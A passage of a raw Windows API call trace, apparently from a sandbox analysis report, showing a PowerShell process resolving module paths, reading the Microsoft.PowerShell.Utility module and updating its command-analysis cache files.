lpOldMode=0x653ef8c1b0) returned 1 [0228.256] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0228.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0228.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c1f0) returned 1 [0228.269] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c2d0 | out: lpFileInformation=0x653ef8c2d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0228.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c1b0) returned 1 [0228.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0228.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c1f0) returned 1 [0228.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c2d0 | out: lpFileInformation=0x653ef8c2d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0228.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c1b0) returned 1 [0228.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x653ef8bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0228.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c050) returned 1 [0228.271] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c130 | out: lpFileInformation=0x653ef8c130*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c010) returned 1 [0228.273] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0228.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x653ef8bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0228.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c050) returned 1 [0228.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c130 | out: lpFileInformation=0x653ef8c130*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c010) returned 1 [0228.308] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0228.319] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0228.324] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d89c0 [0228.324] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b739d89c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0228.324] CoTaskMemFree (pv=0x25b739d89c0) [0228.341] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d89c0 [0228.341] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d89c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0228.341] CoTaskMemFree (pv=0x25b739d89c0) [0228.341] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8b4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0228.341] GetCurrentProcess () returned 0xffffffffffffffff [0228.341] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8b988 | out: TokenHandle=0x653ef8b988*=0x804) returned 1 [0228.342] GetTokenInformation (in: TokenHandle=0x804, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8ba88 | out: TokenInformation=0x0, ReturnLength=0x653ef8ba88) returned 0 [0228.342] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d1b10 [0228.342] GetTokenInformation (in: TokenHandle=0x804, TokenInformationClass=0x1, TokenInformation=0x25b739d1b10, TokenInformationLength=0x2c, ReturnLength=0x653ef8ba88 | out: TokenInformation=0x25b739d1b10, ReturnLength=0x653ef8ba88) returned 1 [0228.342] LocalFree (hMem=0x25b739d1b10) returned 0x0 [0228.345] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5bed46a8, cbSid=0x653ef8ba80 | out: pSid=0x25b5bed46a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8ba80) returned 1 [0228.346] CreateMutexW (lpMutexAttributes=0x25b5bed47f8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x808 [0228.346] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8b920*=0x808, lpdwindex=0x653ef8b6f4 | out: lpdwindex=0x653ef8b6f4) returned 0x0 [0228.346] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d89c0 [0228.346] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b739d89c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0228.346] CoTaskMemFree (pv=0x25b739d89c0) [0228.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0228.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ba70) returned 1 [0228.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25b5bed4e90 | out: lpFileInformation=0x25b5bed4e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0228.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ba30) returned 1 [0228.347] ReleaseMutex (hMutex=0x808) returned 1 [0228.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0228.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b920) returned 1 [0228.347] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x80c [0228.347] GetFileType (hFile=0x80c) returned 0x1 [0228.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b890) returned 1 [0228.347] GetFileType (hFile=0x80c) returned 0x1 [0228.347] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x1000, lpOverlapped=0x0) returned 1 [0228.351] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x1000, lpOverlapped=0x0) returned 1 [0228.351] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x1000, lpOverlapped=0x0) returned 1 [0228.352] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x1000, lpOverlapped=0x0) returned 1 [0228.352] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x1000, lpOverlapped=0x0) returned 1 [0228.352] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x298, lpOverlapped=0x0) returned 1 [0228.352] ReadFile (in: hFile=0x80c, lpBuffer=0x25b5bed61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b9f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed61e8*, lpNumberOfBytesRead=0x653ef8b9f8*=0x0, lpOverlapped=0x0) returned 1 [0228.353] CloseHandle (hObject=0x80c) returned 1 [0228.553] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d89c0 [0228.553] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d89c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0228.553] CoTaskMemFree (pv=0x25b739d89c0) [0228.553] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8b450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0228.553] GetCurrentProcess () returned 0xffffffffffffffff [0228.553] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8b998 | out: TokenHandle=0x653ef8b998*=0x80c) returned 1 [0228.553] GetTokenInformation (in: TokenHandle=0x80c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8ba98 | out: TokenInformation=0x0, ReturnLength=0x653ef8ba98) returned 0 [0228.554] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d2710 [0228.554] GetTokenInformation (in: TokenHandle=0x80c, TokenInformationClass=0x1, TokenInformation=0x25b739d2710, TokenInformationLength=0x2c, ReturnLength=0x653ef8ba98 | out: TokenInformation=0x25b739d2710, ReturnLength=0x653ef8ba98) returned 1 [0228.554] LocalFree (hMem=0x25b739d2710) returned 0x0 [0228.555] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0e8c88, cbSid=0x653ef8ba90 | out: pSid=0x25b5c0e8c88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8ba90) returned 1 [0228.587] CreateMutexW (lpMutexAttributes=0x25b5c0e8dd8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x820 [0228.587] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8b930*=0x820, lpdwindex=0x653ef8b704 | out: lpdwindex=0x653ef8b704) returned 0x0 [0228.590] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d89c0 [0228.590] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b739d89c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0228.590] CoTaskMemFree (pv=0x25b739d89c0) [0228.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8b530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0228.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b9c0) returned 1 [0228.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c0edb38 | out: lpFileInformation=0x25b5c0edb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0228.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b980) returned 1 [0228.591] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8b3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0228.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b840) returned 1 [0228.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b920 | out: lpFileInformation=0x653ef8b920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0228.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b800) returned 1 [0228.592] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8b2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0228.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b780) returned 1 [0228.592] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x824 [0228.592] GetFileType (hFile=0x824) returned 0x1 [0228.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b6f0) returned 1 [0228.592] GetFileType (hFile=0x824) returned 0x1 [0228.592] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b5e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b5e8*=0x1000, lpOverlapped=0x0) returned 1 [0228.596] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0f0f52, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8b288, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0f0f52*, lpNumberOfBytesRead=0x653ef8b288*=0x1f, lpOverlapped=0x0) returned 1 [0228.596] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b258, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b258*=0x1000, lpOverlapped=0x0) returned 1 [0228.599] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0f0f54, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8b108, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0f0f54*, lpNumberOfBytesRead=0x653ef8b108*=0x27, lpOverlapped=0x0) returned 1 [0228.599] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b1a8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b1a8*=0x1000, lpOverlapped=0x0) returned 1 [0228.600] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0f0f20, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8b068, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0f0f20*, lpNumberOfBytesRead=0x653ef8b068*=0x5, lpOverlapped=0x0) returned 1 [0228.600] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b108, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b108*=0x1000, lpOverlapped=0x0) returned 1 [0228.600] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0f0ef2, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8b218, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0f0ef2*, lpNumberOfBytesRead=0x653ef8b218*=0x1d, lpOverlapped=0x0) returned 1 [0228.600] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b2b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b2b8*=0xc85, lpOverlapped=0x0) returned 1 [0228.600] ReadFile (in: hFile=0x824, lpBuffer=0x25b5c0ef170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8b5b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ef170*, lpNumberOfBytesRead=0x653ef8b5b8*=0x0, lpOverlapped=0x0) returned 1 [0228.600] CloseHandle (hObject=0x824) returned 1 [0228.601] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d89c0 [0228.601] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d89c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0228.601] CoTaskMemFree (pv=0x25b739d89c0) [0228.601] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8b2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0228.601] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8b470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0228.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b8c0) returned 1 [0228.601] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b9a0 | out: lpFileInformation=0x653ef8b9a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0228.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b880) returned 1 [0228.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", nBufferLength=0x105, lpBuffer=0x653ef8b320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", lpFilePart=0x0) returned 0x93 [0228.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b800) returned 1 [0228.602] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6fe77092-4798-42ae-bda5-e7f822b580e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x824 [0228.603] GetFileType (hFile=0x824) returned 0x1 [0228.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b770) returned 1 [0228.603] GetFileType (hFile=0x824) returned 0x1 [0228.603] SetEndOfFile (hFile=0x824) returned 1 [0229.586] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef89d98 | out: phkResult=0x653ef89d98*=0x0) returned 0x2 [0229.586] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef89d98 | out: phkResult=0x653ef89d98*=0x0) returned 0x2 [0229.632] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14c760*, nNumberOfBytesToWrite=0x4a3, lpNumberOfBytesWritten=0x653ef8b908, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14c760*, lpNumberOfBytesWritten=0x653ef8b908*=0x4a3, lpOverlapped=0x0) returned 1 [0229.634] CloseHandle (hObject=0x824) returned 1 [0229.636] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe160 [0229.636] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe160 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0229.636] CoTaskMemFree (pv=0x25b73cfe160) [0229.636] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8b280, lpFilePart=0x0 | out: 